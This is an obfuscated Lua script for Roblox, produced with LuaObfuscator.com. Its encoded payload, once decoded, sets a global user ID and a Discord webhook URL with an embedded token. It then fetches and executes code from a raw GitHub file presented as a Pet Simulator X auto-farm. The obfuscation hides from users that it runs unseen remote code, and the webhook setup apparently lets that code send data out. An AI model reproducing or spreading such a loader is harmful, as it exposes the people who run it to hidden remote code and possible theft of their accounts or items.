--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v75=v2(v0(v30,16));if v19 then local v87=v5(v75,v19);v19=nil;return v87;else return v75;end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/((2 + 0)^(v32-1)))%((219 -((199 -128) + 146))^(((v33-1) -(v32-(1 -0))) + (1576 -(286 + 1289))));return v76-(v76%(491 -((713 -(330 + 108)) + 215)));else local v77=(1185 -(67 + (2076 -960)))^(v32-((1571 -(394 + 469)) -(363 + 344)));return (((v31%(v77 + v77))>=v77) and 1) or (0 + 0);end end local function v21()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v1(v16,v18,v18 + (2 -0));v18=v18 + 2;return (v40 * (544 -(5 + 283))) + v39;end local function v23()local v41,v42,v43,v44=v1(v16,v18,v18 + (4 -1));v18=v18 + (6 -2);return (v44 * ((58994549 -34411935) -7805398)) + (v43 * 65536) + (v42 * (540 -(195 + 89))) + v41;end local function v24()local v45=v23();local v46=v23();local v47=1;local v48=(v20(v46,1 + (1182 -(387 + 795)),797 -(594 + 183)) * ((102 -(6 + 94))^(14 + 18))) + v45;local v49=v20(v46,21,737 -(230 + 476));local v50=((v20(v46,955 -(742 + (923 -(161 + 581))))==(146 -(121 + 24))) and  -((605 -(40 + 564)) + 0)) or 1;if (v49==(594 -((2601 -2041) + 3 + 31))) then if (v48==((19 + 232) -(21 + 230))) then return v50 * ((1113 + 328) -(181 + 1260));else v49=71 -(54 + 16);v47=0;end elseif (v49==(4457 -(2460 -(36 + 14)))) then return ((v48==(0 + 0)) and (v50 * ((1 + 0)/((193 -(167 + 26)) + 0)))) or (v50 * NaN);end return v8(v50,v49-(822 + 201)) * (v47 + (v48/(2^(977 -(49 + (2679 -(1738 + 65)))))));end local function v25(v34)local v51;if  not v34 then v34=v23();if (v34==(357 -(5 + 352))) then return "";end end v51=v3(v16,v18,(v18 + v34) -(2 -1));v18=v18 + v34;local v52={};for v63=1 -0, #v51 do v52[v63]=v2(v1(v3(v51,v63,v63)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53={};local v54={};local v55={};local v56={v53,v54,nil,v55};local v57=v23();local v58={};for v65=1 + 0,v57 do local v66=v21();local v67;if (v66==1) then v67=v21()~=(0 -0);elseif (v66==2) then v67=v24();elseif (v66==3) then v67=v25();end v58[v65]=v67;end v56[1 + 2]=v21();for v69=158 -(104 + 53),v23() do local v70=v21();if (v20(v70,1,1 + 0)~=(0 + 0)) then else local v83=v20(v70,2 + 0,8 -5);local v84=v20(v70,8 -4,6);local v85={v22(),v22(),nil,nil};if (v83==(1847 -(1654 + 193))) then v85[3]=v22();v85[4]=v22();elseif (v83==(1363 -(190 + 1172))) then v85[3]=v23();elseif (v83==2) then v85[3]=v23() -((3 -1)^(51 -35));elseif (v83~=3) then else v85[3]=v23() -(2^(74 -58));v85[4]=v22();end if (v20(v84,1,4 -3)==(1 + 0)) then v85[4 -2]=v58[v85[1847 -(1004 + 841)]];end if (v20(v84,2,4 -2)==(1 + 0)) then v85[3]=v58[v85[743 -(298 + 442)]];end if (v20(v84,3,3)~=(2 -1)) then else v85[539 -(167 + 368)]=v58[v85[4]];end v53[v69]=v85;end end for v71=1 + 0,v23() do v54[v71-1]=v28();end for v73=1,v23() do v55[v73]=v23();end return v56;end local function v29(v35,v36,v37)local v60=v35[1];local v61=v35[2];local v62=v35[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1;local function v82()local v88=v60;local v89=v61;local v90=v62;local v91=v27;local v92={};local v93={};local v94={};for v107=0 + 0,v81 do if (((392 + 2453)<(9592 -6359)) and (v107>=v90)) then v92[v107-v90]=v80[v107 + ((1199 -424) -(72 + (1896 -1194)))];else v94[v107]=v80[v107 + (1649 -(885 + 763))];end end local v95=(v81-v90) + (752 -(688 + 63));local v96;local v97;while true do v96=v88[v78];v97=v96[(437 -(17 + 418)) -1];if (((691 + 792)<(2187 + 324)) and (v97<=(1078 -(740 + 335)))) then if ((v97<=((1162 -(1047 + 114)) + 0)) or ((154 + 389)>(1523 -(22 + 93)))) then if (((2466 + 1036)>=3431) and (v97==(0 -0))) then v94[v96[3 -1]]=v96[(2 -1) + 2];else do return;end end elseif ((v97==(3 -1)) or ((2433 -1834)>=(2241 -(405 + 1102)))) then v94[v96[2 + 0]]();else local v120=v96[4 -2];local v121=v94[v96[1124 -(988 + 133)]];v94[v120 + (3 -2)]=v121;v94[v120]=v121[v96[1 + 3]];end elseif (((158 + 2254)==(2931 -(411 + (441 -(194 + 139))))) and (v97<=(1890 -(1879 + 6)))) then if (((1807 + 278)>(92 -51)) and (v97>(2 + 2))) then v94[v96[2 + 0]]=v37[v96[9 -6]];else local v127=v96[1629 -(200 + 1427)];local v128,v129=v91(v94[v127](v13(v94,v127 + 1 + 0 + 0,v96[2 + (4 -3)])));v79=(v129 + v127) -(3 -2);local v130=0 + 0;for v135=v127,v79 do v130=v130 + (1889 -((2075 -(262 + 666)) + 741));v94[v135]=v128[v130];end end elseif (((4492 -(475 + 373))<(2094 + 2851)) and (v97>(1937 -(1821 + 110)))) then v94[v96[(3 -2) + 1]][v96[6 -(4 -1)]]=v96[4];else local v133=v96[5 -3];v94[v133]=v94[v133](v13(v94,v133 + (765 -(494 + 270)),v79));end v78=v78 + (1087 -(636 + 450));end end A,B=v27(v11(v82));if  not A[1] then local v98=v35[4][v78] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003023O005F4703063O00557365724944022O0080C20A46D04103073O00576562482O6F6B03783O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F393334303938302O342O3537383536372O392F6446786B6D5F793062492O5149393662682O3932762O45437366527769356B6962704C532D71687572314E773951334A436870734F345772474D51745F78304F556A3065030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C7561000C3O0012053O00013O0030073O000200030012053O00013O0030073O000400050012053O00063O001205000100073O00200300010001000800122O000300094O0004000100034O00065O00022O00023O000100012O00013O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
